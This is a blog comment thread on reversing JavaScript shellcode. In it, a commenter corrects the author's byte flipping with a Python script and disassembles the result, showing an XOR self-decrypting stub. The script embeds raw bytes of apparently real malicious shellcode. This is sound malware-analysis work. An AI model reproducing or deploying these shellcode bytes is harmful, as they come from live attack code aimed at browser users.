tag:blogger.com,1999:blog-6690994337395244641.post5429567000443330518..comments2022-03-30T14:14:56.448-05:00Comments on Paul Melson's Blog: Reversing JavaScript Shellcode: A Step By Step How-ToPaulMhttp://www.blogger.com/profile/02530533566781746778noreply@blogger.comBlogger2125tag:blogger.com,1999:blog-6690994337395244641.post-68788750531984705722009-11-20T21:18:56.615-05:002009-11-20T21:18:56.615-05:00You're exactly right. Nice catch! I've ch...You're exactly right. Nice catch! I've changed my Perl code in the post so that it flips the bits correctly.PaulMhttps://www.blogger.com/profile/02530533566781746778noreply@blogger.comtag:blogger.com,1999:blog-6690994337395244641.post-19531657088721922042009-11-20T19:41:36.010-05:002009-11-20T19:41:36.010-05:00Hello, nice post but you have gone slightly wrong ...Hello, nice post but you have gone slightly wrong in your approach.<br /><br />When converting the original utf encoded string you need to flip the bytes so they are as they appear in memory, e.g. "%uC92B%uE983" becomes 2B C9 83 E9.<br /><br />Here is a python prog to do it:<br /><br />#-[foo.py begin]---------------------------#<br />import struct<br /><br />s1 = "\xc9\x2b\xe9\x83\xd9\xeb\xd9\xee\x24\x74\x5b\xf4\x73\x81\x13\x13\x29\x89\x83\x57\xfc\xeb\xf4\xe2\x52\x22\x14\x7a\xe3\x40\x3d\x2b\xd1\x75\xde\xb0\x44\xf2\xc1\xa9\xdb\x50\x3f\x4f\xd5\x02\x04\x4f\x68\x9a\x31\x43\xd9\x4b\x01\x78\x68\x9a\xd7\xe4\xef\xa3\xb4\xf8\x09\xde\x05\x7b\xca\x45\xb6\xa0\xef\xa3\xd7\xe4\xe3\x80\x0e\x2b\xb6\xa3\xd7\xe4\xf0\x5a\xe7\xd0\xdb\x18\x78\x41\xfa\x3c\x3f\x41\xeb\x3c\x39\x40\x6a\x9a\x04\x7b\x68\x9a\xd7\xe4"<br /><br />s2 = ""<br /><br />i = 0<br />while i < len(s1):<br /> s2 += s1[i+1] + s1[i]<br /> i += 2<br /> <br />print s2<br />#-[foo.py end]-----------------------------#<br /><br /><br />running this script to generate a binary blob:<br />>python foo.py > scode.bin<br /><br />and disassemble the blob with ndisasm (http://www.nasm.us/):<br />>ndisasm -b 32 scode.bin<br />00000000 2BC9 sub ecx,ecx<br />00000002 83E9EB sub ecx,byte -0x15<br />00000005 D9EE fldz<br />00000007 D97424F4 fnstenv [esp-0xc]<br />0000000B 5B pop ebx<br />0000000C 81731313892957 xor dword [ebx+0x13],0x57298913<br />00000013 83EBFC sub ebx,byte -0x4<br />00000016 E2F4 loop 0xc<br />...snip....<br /><br />we can see the shellcode starts by finding its address in memory and begins decrypting itself with an XOR loop and a key of 0x57298913.Anonymousnoreply@blogger.com